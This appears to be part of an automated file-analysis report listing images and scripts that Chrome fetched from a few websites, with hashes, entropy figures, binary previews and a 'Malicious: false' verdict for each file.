                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):14496
                                              Entropy (8bit):7.9333716100688605
                                              Encrypted:false
                                              SSDEEP:384:K0wDuo+ixBvN7E+d58kpzLd70SSwiA/PxrIu:KE5ixBy+fXd70xo6u
                                              MD5:74470F10C999F7A08F73DB1053314461
                                              SHA1:EE5C68F3ABEF255813206F19769AD5C0B7DDC25C
                                              SHA-256:A6F841EC62471313188A79C5EFCAA6FE6D7399CC234E6C62BF362BB53DF1B26D
                                              SHA-512:41ADCE8D09C14FF99A5D92D3BB9F8D178CEA853FBFD2666D67364DC7C2345915BB54965F740B5F3D063ADC83B96A7CB128AD56B1103703F962312CAB122228AD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/clients/cdc.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):17073
                                              Entropy (8bit):7.7361423103948805
                                              Encrypted:false
                                              SSDEEP:384:4YNg7DuXEc01NPwFLSFeXoaCJ7sHJn6iWAVvBwhM7Ttx569zY31WH:4Yyu0vToFLSFeXPUAHh5WyvBj7Ttx56v
                                              MD5:65EB618583D820621A984BB8C78320B3
                                              SHA1:6EA1D7DCB231FF3A9E8287F66DD9F7494323804D
                                              SHA-256:14E004D6A8961F8E63F634C15FFA779C49A0553F0E1436FB0738D6264BAEFBFE
                                              SHA-512:2F3C718513EEAB4ED8D3A153187F2DA837C697CB5DD20E509ADD27F212D0A969CED643D13620C3C726BACA56DCDFBDAC3D766C86C03F04391CCDB512777B6F45
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3215
                                              Entropy (8bit):7.921420679215034
                                              Encrypted:false
                                              SSDEEP:96:4O1WPBFjHcIJd8G3rLcIIZuFJwXswV70xn19Pjn:Ra3J2G3rLsuFJwt4DPr
                                              MD5:17902C7B2E56CF2F04B7B177E508E29C
                                              SHA1:43FEF846D205EEF612F6841B5E213D86CE10C103
                                              SHA-256:DCCEF19A8074112D2A7046A1D125B3B19ED474A2062D2E717EB1E8B52467DDB8
                                              SHA-512:A04299FC2D7039477E69BFA414237ABCF293359A536AED3E1006465563D4835128BDEB9F9E1C94D1109CB2A463E83F4595E707FB3FE8A5771CAA27F672DC3D31
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/career.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE......!3a..\.......1_...................(N.$W.,X*<k..c...!3g....0U....#....#6['8e..............C7/....1l......J5.U^xQ/.H97.......*^@1-X5...../..{....I....|y8+'....8%......L*.............er.........................0!....8Gn.-- '@B#.qvv........QC>...EQh......th.......2GFTx{......!....."...23I...........6.bGZMH..Y...9?[......c>).......O...........dr....Z....jfd....3..q.}ie..3.d.....|....T[.oB}..Z....IDATh...O......m.........I.......'.U..$.8P..........Z.O..k...s_..J.8......@....~o5q.+IR ..f..........'...0..o.........=Ol..../N.^G...w.y....._..x.}O /....JJ..._.|.s....b...l.^.~3..,N`\F.8..0.,.-....l..$.O....y...+.....s......(.H$"~.....'*.p.A..BD...!...&W.....v.T..q.Y.*...*\1.3..g=...pD..+..)+.m......a....@E.z.........-.g.!@...ES...........).wvv..8..a..i..bs.&.%.._1.Z:..........~...To.1........./...*b.K..V.t.k..G..W....>~L.w.p....`......|.lr.........O..>}.j..l.......q.......^.S.....X,...66.cK.Te...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):72902
                                              Entropy (8bit):7.987918984883526
                                              Encrypted:false
                                              SSDEEP:1536:XCjK5eSCJhsJd9APVtC4ECO822TEn0nXvCP+ABE/J3IejRvwczbABgv+yK1UJ5C:XCOCJM+C4c822Ya6P+SCjRfbABgvfA
                                              MD5:346FC7D1F0DBF38B2FA7C25688319976
                                              SHA1:2D27A65F07A9167F36A8E548167653688BFDD546
                                              SHA-256:3D71A1E8004058039164EBC0F4F5F4314688C7ABE6B6FFE64AA1579C2189EF49
                                              SHA-512:D97904EB2B76710D55A6A571E4826C48EEB413AD9AF7858B9FF380A650928AC7D6C93EEA9AE148FD9E65E4744FA86D1F2D59BE629FA213B9D9C50BC054058476
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/menu4.webp
                                              Preview:RIFF....WEBPVP8X..............ALPH.e.....m.Hu...."b.rL%.J{$....$sQu.E..F.&.Bb.rC..6Il.@.,.2.hs..Y....M.AX.E.I/....z.'?.O....|I..ol.ykk....b......9Q.R....'.EqU..s..H.L.p.NDL....H.m..U.RC.....:9.j,.].........#"}.*"&.n$I.$I.b.ANB.2.4O.5/.\..'rXo.....w7.PDL...("...Kj.{C.!.$,.l....(D..t...Cf[....G...._........>..&..R.!X.N....|.....@..$....P~.g....j.,..4$..iHP.[.......@...D.......y....XQ4.G3C...A...>.gXu......E..x/72...$jU^.SN...Q...>...p..K.[D..D..lE...J<!A..K.I*.<.r.$.L.`....V.{d.....^.&A..myB...?.9X.W.(....9H.....Y.......G..^.4........(..0..%.eYy..xk}...%z.V.Y...{.=...U....!..l..$..."y...q.M...X..7.[..+KN...Dm....0E5..V$..&M...N\C..G.&....'dS..6W.lh....'T&].6.....$.$H.h.\A..9...V.t....X.V..X!.2.gAY I..YM..(I..HbM..2.k......`.G0..X.A..v`"`....x....|".,H.[.ZarA...$.X6....g.$......5.6T.6.=..Q...K......1...}.?.}.........kR.,....tJ.g.+......%e?M.Xs]..I.....>/..@.M.o....m....J........n.....%v..K4.2%q.,IP{.5k.l..)..B_.~../..u.5..V_0..O_."k...x...R..}.RI...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6830
                                              Entropy (8bit):7.953152234593612
                                              Encrypted:false
                                              SSDEEP:192:gSp2AeV0Xo9B0y0rZytuUro6qa5bPfb2P:ZpBeVfvxGauUrrqa5OP
                                              MD5:8889543E618F127B9DA1B6959E491D10
                                              SHA1:821BDA76B10F983D8AC74F05149BC2215E752F89
                                              SHA-256:F4475BA47A4558516AAE5E13B2DF8B81438D4174AC3BDE2766E229FB228BD61C
                                              SHA-512:AEC58E3E0FA1CFA0B0EDE466E79E2F87B3FCCE4CFF4BC9E150F297716FA553C5D54C202DA1D9D74A66FBF18C27D6A1D2CE483A00CA4953ACB471D9FC506E9D81
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....AZ.....X..........@U..T.CU..Q..P.BN.....T.=Q..V.?S.@a..K.FZ.7L..R..\.CV......3,V),[.<Z..M*,S...4*`.AL.E[79b.GQ.....J........V.8T..Q.......Ef;7kFG.HE{......'1b .V..^..Z7H}.5^.>E........E/2h...@Cp7)J.;\1;q..S...Y0T....FL..I.:L.....Z...I4k..E.EZ.....SH,L.....R..M('J.-M....Bc.Dd....1_9K..Z.p4W.....M....#h.%[...#@e...~-W.Mig"V.Ec.8X.p..SA~.DZ.Yv.BbF5\.X.WGq....9\...@e.,U...(8X.Bj.;u....>r.;X..#c.7q.v......O.|...].....sCncf..u...Y.Kz.........N.......].............IDATh...S.h.........nhJ$.!.)...@.p.. ..G.#X.v.d.[.:e..X.VO...N......VY.'.3..O......a...#1...L.b.I.1L&V...I*.....I..^(&..Ij$....0..?......hA.0o...F............&.W...QU.h....#.....B...B...+.^..hz......Z-.3$F..uL.1...."bd$fp....OhQ..F.........1.f.{x.B..b!.a.8]HSiEQ.ZYUU.`..f....|....3..M~....N75.bf.....gB1U.G.....v.u|b.BCG.&v6.p..l.d4. ..+.4.P...dj..{...>.ej ...B.m.6U.T....H.,}v.....n..L.xG.|...."..z......5V..3R7N..m.#2eM.K..h.0MI:....?........&...$.ZA....8;..XTC!
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (724)
                                              Category:dropped
                                              Size (bytes):3487
                                              Entropy (8bit):5.373569985049004
                                              Encrypted:false
                                              SSDEEP:96:rPxgYZpBnecBii6nz1hAf3UUvz6+Ze1WP1dX5n:TxgYZGy6zTOXL6Cekv5
                                              MD5:5A9ABF02F5823F5A50F6B022A9FEDC3E
                                              SHA1:C1C9B68A1943FBF6E41FB8A848069102337B5ABF
                                              SHA-256:37F2F9F0E0D75497FE736BD0022FAFA40EEC0E9575A0E50128C8FA2DCFE01A63
                                              SHA-512:63C0CB51BB815B52BF199BF1F7A77FA3B818B8CE89545314670E8B394CD322A73270F1FD53F4DC7EAA0E4C1B06BF21936CE6768270530B6C116978B80A964A89
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('overlay', function(_){var Oya=function(){},EC=function(a){a.uA=a.uA||new Oya;return a.uA},Pya=function(a){this.Eg=new _.om(()=>{const b=a.uA;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},Rya=function(a,b){const c=EC(a);let d=c.Fg;d||(d=c.Fg=new Pya(a));_.rb(c.Eg||[],_.dk);var e=c.Ig=c.Ig||new _.xsa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new Qya(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.pm(d.Eg);c.Eg=[_.bk(a,"panes_changed",e),_.bk(f,"zoom_changed",e),_.bk(f,"offset_changed",e),_.bk(b,"projection_changed",e),_.bk(f,"projectioncenterq_changed",e)];_.pm(d.Eg);b instanceof _.Gk?(_.Vk(b,"Ox"),_.K(b,148440)):b
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):9888
                                              Entropy (8bit):5.150985435445677
                                              Encrypted:false
                                              SSDEEP:96:+85AitLhAfkLmAKFLkA9+LmAQHLdAjwuA+BLHAhaEAkzdA0jCAxKr+ACt7+A3sFk:jLpaqSN2zQB8rIM3vr9c/Z
                                              MD5:F6121B7C65684EEB2C8EC0DB0C639980
                                              SHA1:BFDBDEA6864F10AE42C0A5BABDDBF6DB01F413FF
                                              SHA-256:534C75D8EC6E9825ABCFC62206BE580B90C2896427D88B4081A8E79190066FF8
                                              SHA-512:D0EF2E2E15D0E379492E4A90A53AE2F4E9E41333C00DDA4BED7F87F06072850DFC414B1DAD59728F23FE24A14A9309412C77926E96909F13E70C6D334676EF1F
                                              Malicious:false
                                              Reputation:low
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="193.143" height="128.198" viewBox="0 0 193.143 128.198">. <defs>. <filter id="Rectangle_Copy_16" x="0" y="0" width="193.143" height="128.198" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03" x="84" y="95.099" width="37" height="24" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur-2"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur-2"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03_-_color" x="77" y="96.099" width="22" height="22" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):7059
                                              Entropy (8bit):7.954430035945746
                                              Encrypted:false
                                              SSDEEP:192:K/dCWzPit10esaOoQkgat4gOQLoCGvRDvQhXLIRjhv:K/dzF2l4PQmY14R
                                              MD5:D84DDF1885F44B512D0058DEE97E61B8
                                              SHA1:2D3CB40FDDC5CF2D969C7E97BAFA40158174BA10
                                              SHA-256:5C25FBD597ACB049F613C465BC94FCDEF9310B91F1F23C14794166608BA0E255
                                              SHA-512:0C96FF24E4D8F29998928CEC9AA9E344AE85D1AD63623A38DFDEBBC38127F985BC95CFCC3D61BACFECADEEF8613B71E16FF4FA62365F1B1E0914581865A2DA6A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE........Z...............Ng...B......Pe.Nf...=...Ld..................r.Lc...........\...0K..r...V............Qh..z..J.........Qj.....MHh.....y.........F.........Pe...We.Mb....`w....ag.{..................4P.....K...1M..al..~....o....i}....Vi.......CS..c........,m..........{..6O......M.jtQk.Nh.....5...<J.e.C`...c..s._t^_...............=.q.....L]......'F.>W......^t.1K.......V.?M.....H\..........D............u..OOCj.V^..O.y.....cE^....fv........y....Nc..e..p....l|.....)B.x..eh.L....Zm....~._..(J..CQM]........'.}..D.......?..k...._j.a....EM....'.......w..............@.m.Js...NW........M......g...F..!<...P....c........xi....<U...........Nk.i..=@......[........x..B\......r..~.Mm.\t.[...i.......lc.)..c..G^..Q..e..i@...NIDATh.|.mH.....!3.!2I&3..y#.%..*U.FCb.bb...D.b..i.V46..Z-.D.^_.hm./.Z.B.U.V...R..m......-.{..../.m).I2a.._...<..w(L...PH....t:). P......L.T*...9..CCmKmkk.$.B|-.NRN.7..4.;.|.`<6.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 64 x 64, 8-bit/color RGB, non-interlaced
                                              Category:downloaded
                                              Size (bytes):1158
                                              Entropy (8bit):7.723713747889109
                                              Encrypted:false
                                              SSDEEP:24:3Qs/6BlqEboNd0ITwammvMTMDBTbMwsl2Wnzl2xHHh00wo6:33/6BYYoNd0ITYcYmTJsP4lO0o
                                              MD5:8402E328FEAA01B4D8FB17DCE7C5D61B
                                              SHA1:9849F20CF772C20F4F9E17C85E2107675B7594CE
                                              SHA-256:5BFF0E6830AB6EE936935115262A31D1AADC9A7050718F032DDE63641334D641
                                              SHA-512:8ACD9A5657C80865321A896B2B2DB87268CF16F711785E8AE3A01DC888E2D4937052940CB47F45E82C829A1986C632F4EA39099D61E0B6E597CD33041C75D46D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/images/cdcicon.png
                                              Preview:.PNG........IHDR...@...@.....%......sRGB...,.....pHYs................+IDATx..X.K.Q...K. .P.E....d$.F7.^.m7..]l~..(~6E...9?.s~LEm.z..],/.Em......|Q.y.{..M:.....y~..9.y.y..yX.))...t..]\....s.5.@.'{..k...`...F..`....;.F@.8....`....;.F@d.33....V...%.W.@........D.=...x....@Gf.V.. ..7&...6........M..SSoGF.KK.....f..........*...1..........=.....'.k.`..p../U.\.........T*.R.. ....4....$..UWW...c.....p8..%...M.D'.t...."\(......IKK......m."z.a...V.B........K!t.V............I......G..._.O!.......J.........nB!.N.8::..|...)..1.LF.1.C..n...nB.@...o".."1..F....... ~..dvvvssS.V..b...........Y\\lll$ `...3$Xy@.....G.......`~.r...Cx.....TT............%..!....z..ZXi....F$. 1R.......b...j...b........a..p..+*w...k.TP..c......o.sQ..-:...O....r..,|.A!(.i+PQ..J."E.f3....j.9%j.J....}D&..F..3xAKN:...J.Z,...........@(.BwK..........'...5....5....4....u8B7H..@..#pB.N..........-..r.a.G...h.fK.|..Hx......}.....WT..m.Z-...9...7.......i.N...8p.nno..?.g\f..T..\_XD....W..../.......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13798
                                              Entropy (8bit):7.636858848128382
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwyn1tj+OtVRTNsJIc2G8zde850s5l6HxpzPxFj+lJfstf:4YNg7wr+KzTzcf8zde850sYTHcJAf
                                              MD5:3721E85E5B34424496A02F4046322D6C
                                              SHA1:CD8D73A67AD84628545516C9FC9759611BEEB777
                                              SHA-256:C67BD59DF030003D678FD0642CA6CCEC3107F01613642A1117D87C24FB27E603
                                              SHA-512:1D721913227051DA206EBE3B09C4CB11370682D5CA20AD3BA722FAFAA1678EB7E2E4B76F34718D5E503BA9AA09E025F7362D4DA1969095D2354E852CAE1B2F5C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/30/52a16fee16be4cc11cc072eda9411226.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                              Category:downloaded
                                              Size (bytes):600
                                              Entropy (8bit):7.391634169810707
                                              Encrypted:false
                                              SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                              MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                              SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                              SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                              SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                              Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:downloaded
                                              Size (bytes):104862
                                              Entropy (8bit):4.654487208781556
                                              Encrypted:false
                                              SSDEEP:1536:1h6T7kPStpJUjt7vKsUuzm8mOxnsVtw1pACJMQ:1he7kPStpJ0tfUuzlsVO1pACJv
                                              MD5:91A46E69386CCA20AA260D358DEA00A0
                                              SHA1:D560A4658353386216F949838E0EBD395B585538
                                              SHA-256:4C9E37E2CCB6DFB077A62074B86568CF2879EF88FD75F55DEEB5BE2ACF40DE6E
                                              SHA-512:49F4EDCDD8AB5113118118AE5EF1AAA3C7E538AC9476C5F113A47FBD9E7DB58E829596E44A55978D304001F76AAF3CFA52CDFF76AD32C98C0953F0712B0228F5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/main.js
                                              Preview:/***************************************************..==================== JS INDEX ======================..****************************************************..00. Preloader..01. Cursor Animations..02. Offcanvas..03. Scroll Top..04. Modals..05. Header 1..06. Header 2..07. Header 3..08. Header 5..09. Header Search..10. Roll Slider..11. Workflow Slider..12. Team Slider..13. Testimonial Slider..14. Testimonial Slider 3..15. Portfolio Slider..16. Service 1..17. Counter..18. Button Hover Animation..19. Button Move Animation..20. Register GSAP..21. Config GSAP..22. Service 6..23. Choose Section..24. Portfolio 5 Animation ..25. Title Animation..26. Title Animation Top..27. Text Animation..28. Text Animation Top..29. Offcanvas Menu..30. Service 3..31. Folks animation..32. Menu Text Animation..33. Main Portfolio Sticky..34. Hero 3 Animation..35. Home Page 2 Animations..36. Award Animation..37. Portfolio Main Slider..38. Portfolio Animation..39. Portfolio Slider 2..40. Portfolio Slider 3..41.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (18082)
                                              Category:dropped
                                              Size (bytes):18702
                                              Entropy (8bit):5.692044148561377
                                              Encrypted:false
                                              SSDEEP:384:9uM0tLMKliViKW2IUZRVgf/AUH4fVYnaeZeRqVCWPb1HLLLn9o5T:M3ZEiwS/AUHy4aenFPJeh
                                              MD5:21A339BE9D607AF00807C153BAADADA6
                                              SHA1:56772DED02008F3B8071695A90269EE3BE2473D8
                                              SHA-256:CC483835A32239478A299DA9A976381CCBCC7F9542AB86AF354FFA5A036CD82C
                                              SHA-512:064A04D0B45C67DDF4A8614270669410A54A7FB8B91B48FF358408B2C9464C9466638E1E4C07098F94A26E9EDD7253CF6F6EE03F5B1C58A232D7C410A00D77BF
                                              Malicious:false
                                              Reputation:low
                                              Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var P=function(V,A){if(!(A=(V=null,L).trustedTypes,A)||!A.createPolicy)return V;try{V=A.createPolicy("bg",{createHTML:k,createScript:k,createScriptURL:k})}catch(g){L.console&&L.console.error(g.message)}return V},L=this||self,k=function(V){return V};(0,eval)(function(V,A){return(A=P())&&V.eval(A.createScript("1"))===1?function(g){return A.createScript(g)}:function(g){return""+g}}(L)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',.'',.' Copyright Google LLC',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var ok=function(V,A,g){if(V.length==3){for(g=0;g<3;g++)A[g]+=V[g];for(g=(V=[13,8,13,12,16,5,3,10,15],0);g<9;g++)A[3](A,g%3,V[g])}},Y=function(V,A,g){if(V==476||V==166)A.T[V]?A.T[V].concat(g):A.T[V]=Vz(g,A);else{if(A.ki&&V!=183)return;V==179||V==247||V==123||V==187||V==36||V==159||V==352||V==43||V==105||V==366?A.T[V]||(A.T[V]=AV(V,46,A,g)):A.T[V]=AV(V,73,A,g)}V==183&&(A.O=F(fal
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):45240
                                              Entropy (8bit):7.9954877793078545
                                              Encrypted:true
                                              SSDEEP:768:wmRGkmmRc+ekyWhZwgHZd7ceI0ikJL0om53zmWSeG1VtrSjz3U8gtkD5ecGUeb:NGlmLHlmgHDNIzGLzm5SWSeOtWjzVpDI
                                              MD5:F1A8DAB20468A00D9E77DD689CFBCCA7
                                              SHA1:957C3335CAE08CEAD77AAE0B34E376110BD1C1F3
                                              SHA-256:D0399F5B6DB766314144D936560D74E0920F482AB01F16A298392E9A13E61F5B
                                              SHA-512:2D874B8D369EDF0F9536C292BEC2A6A368D615FADE26E08B1A483C8B9FB630E72DF3BD9CDFAC4DF85B2E006E9255992D03760A8C7CF05BC944285EB44206AE0C
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 <........*....>.n.S)&3.$rJZp..iA..g..\...C_.x..c..=........?...1d6O.Q.8hy.......,w.y.../.y._..w._......7b/.Y7._....$.G.^.......$..j...........?.......~....-.=..ao...=d.....7..^RR..-`....%.......u..K. #W..@D...%........"...@.Z..0x3.@D....{...*<P.K..s.k...~.bL{{..<...?;.H.j.D.`.T..B......(....4H.....^..$@X...3..H..~E\..^3.O.@g./..(wf...f..C..?a.._.P..9..D.......f..w..C..Kv .....hT... ..NT.5.J..x.L...r.[.&$Z...9R...E.]A.....78.#D.#...n....e...8..#6|n$T....`F.7.........._j..(.1.x.....ui..s.T..R.F.&$T...;.7.8.?Y.]....Q|7......R%...]|..K..`..."9.y.y...8Y....8.|....o....\h...8a...o....K.L ..........r...H.....H.w..Mk....#...........oZ....%VHg\....J#o.0.vrG.b..".......X....a...u..}.... .q#...d4..:.PN..Pd..A%...i.].......}<P4.P@.*7..,./B......2...."m.IW......,.y.......0.zq ....c..r?.........d.\t*c..?.4.1"..=......&....T~.4.fEE...t.U.*.o..}q.1. ...u..h...0.P ...8H.2cC'..g.?],.u.Q4r..i..c..7.*...@HKYE...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12951
                                              Entropy (8bit):7.630395591249626
                                              Encrypted:false
                                              SSDEEP:384:4YNg7WpabymqgItqk7wlmDZI7gwhGP7g5Ir87aUX:4YyYvmbItvTDO7+geua2
                                              MD5:28179E7CD97B863985C13D43F4CE42B2
                                              SHA1:FEB1428759776D9ECFFB58E869669444FF3BC108
                                              SHA-256:81D00A8BCEEC1B4F0ABD5F94077497C2DE8CFE86423EC53153E6EEF48B446BC4
                                              SHA-512:AD992EF15EE2365646F50CECF3A10E8BA92C6C8EC2FC0FCAF840522BEDC716E71CE391D066853A90E636A5AA13C394DDEBA977C26AE760F48AA9DC6377C9CA7F
                                              Malicious:false
                                              Reputation:low
